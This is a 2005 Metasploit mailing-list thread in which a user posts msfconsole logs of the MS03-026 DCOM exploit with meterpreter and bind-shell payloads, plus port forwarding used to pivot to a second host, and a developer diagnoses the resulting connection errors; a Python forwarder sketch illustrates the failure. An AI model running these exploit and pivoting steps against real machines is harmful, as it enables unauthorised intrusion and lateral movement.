Metasploit mailing list archives

use of meterpreter (copy for the list)


From: thomas.werth at vahle.de (Thomas Werth)
Date: Tue, 19 Apr 2005 08:05:23 +0200

I just rechecked the vulnerability of the host to be sure not to have an
invulnerable host.
So I'm now using the former proxy host as the target host and a new vulnerable
host as the proxy host. Now I get an error 11001.
Here's the log:


                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]


msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.185
RHOST -> 10.10.10.185
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default         Description
  --------    ------    ------------    ------------------
  required    RHOST     10.10.10.185    The target address
  required    RPORT     135             The target port

  Payload:    Name        Default                                        Description
  --------    --------    -------------------------------------------    -------------------------------------------
  required    EXITFUNC    thread                                         Exit technique: "process", "thread", "seh"
  required    METDLL      /home/framework/data/meterpreter/metsrv.dll    The full path the meterpreter server dll
  required    LPORT       4444                                           Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x92ca
[*] Got connection from 10.10.10.56:1156 <-> 10.10.10.185:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -=    connected to    =- ]
[ -= meterpreter server =- ]
[ -=    v.  00000500    =- ]
meterpreter> use -m Net
loadlib: Loading library from 'ext699020.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 10.10.10.88 -p 135
portfwd: Successfully created local listener on port 9000.
meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.88 -p 4444
portfwd: Successfully created local listener on port 4444.
meterpreter> portfwd -v
Local port forward listeners:

  127.0.0.1:9000 <-> 10.10.10.88:135
  127.0.0.1:4444 <-> 10.10.10.88:4444
meterpreter>
open_tcp_channel: failure, 11001.
meterpreter>
--------------
second shell:
--------------


                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888


+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 9000
RPORT -> 9000
msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default      Description
  --------    ------    ---------    ------------------
  required    RHOST     127.0.0.1    The target address
  required    RPORT     9000         The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Got connection from 127.0.0.1:1221 <-> 127.0.0.1:4444

[*] Exiting Bind Handler.

msf msrpc_dcom_ms03_026(win32_bind) >

mmiller at hick.org wrote:
On Mon, Apr 18, 2005 at 10:07:48AM +0200, Thomas Werth wrote:

Does the bind handler ever say it established the connection?  Does it
say this before or after the 'Connected to REMACT'?  If it says that the
bind handler has established the connection before the 'REMACT' line
then you may have created the port forward too soon.  Can you include
the full output from the exploit command?


The bind handler doesn't say it establishes a connection. I just saw that in the
meterpreter window an error is thrown: open_tcp_channel: failure, 10061.


The above error code indicates why it's not working.  10061 is
WSACONNREFUSED.  This means that when the meterpreter server instance
attempted to connect to 10.10.10.77 on port 135 (or 4444 depending on
the stage), the connection was refused.  This is probably indicative of
the fact that the exploit did not work against the machine that you are
attempting to target.  Are you certain that it's vulnerable?
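The failure mode mmiller describes above (the local listener accepts the exploit's connection, only then tries the remote connect, and meterpreter reports "open_tcp_channel: failure, N" when that connect is refused) can be reproduced in a few lines. This is an added illustration written for this thread, not Metasploit's or meterpreter's code; the Winsock constants, the toy forwarder and its function names are constructed for the example.

```python
import socket
import threading
WSAECONNREFUSED = 10061    # host reached, but nothing listening on that port
WSAHOST_NOT_FOUND = 11001  # host name could not be resolved

def open_tcp_channel(rhost, rport):
    """Return (sock, 0) on success or (None, winsock_code) on failure."""
    try:
        return socket.create_connection((rhost, rport), timeout=2.0), 0
    except socket.gaierror:            # name lookup failed
        return None, WSAHOST_NOT_FOUND
    except ConnectionRefusedError:     # host up, port closed (the 10061 case)
        return None, WSAECONNREFUSED
    except OSError:                    # timeout, unreachable, ...
        return None, -1

def _pump(src, dst):
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        src.close(); dst.close()

def start_portfwd(lhost, lport, rhost, rport, log):
    """portfwd-style listener: the remote connect happens only after accept()."""
    listener = socket.socket()
    listener.bind((lhost, lport)); listener.listen(5)
    def serve():
        client, _ = listener.accept()          # the exploit side sees this succeed
        remote, code = open_tcp_channel(rhost, rport)
        log.append(code)                       # 0, or the failure code
        if remote is None:                     # -> 'open_tcp_channel: failure, N'
            client.close(); return
        threading.Thread(target=_pump, args=(client, remote), daemon=True).start()
        threading.Thread(target=_pump, args=(remote, client), daemon=True).start()
    threading.Thread(target=serve, daemon=True).start()
    return listener.getsockname()[1]           # lport=0 picks a free port

def demo_refused():
    """Forward to a port nobody listens on: accept succeeds, the channel fails."""
    probe = socket.socket(); probe.bind(("127.0.0.1", 0))
    dead_port = probe.getsockname()[1]; probe.close()   # now free, so connect is refused
    log = []
    lport = start_portfwd("127.0.0.1", 0, "127.0.0.1", dead_port, log)
    with socket.create_connection(("127.0.0.1", lport)) as c:
        c.recv(1)                              # b'' once the forwarder closes
    return log[0]
```

Note that the client side only sees its own connect succeed and the socket close afterwards, which is exactly why the exploit console prints "Got connection" and then exits while the real diagnostic is in the meterpreter window.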



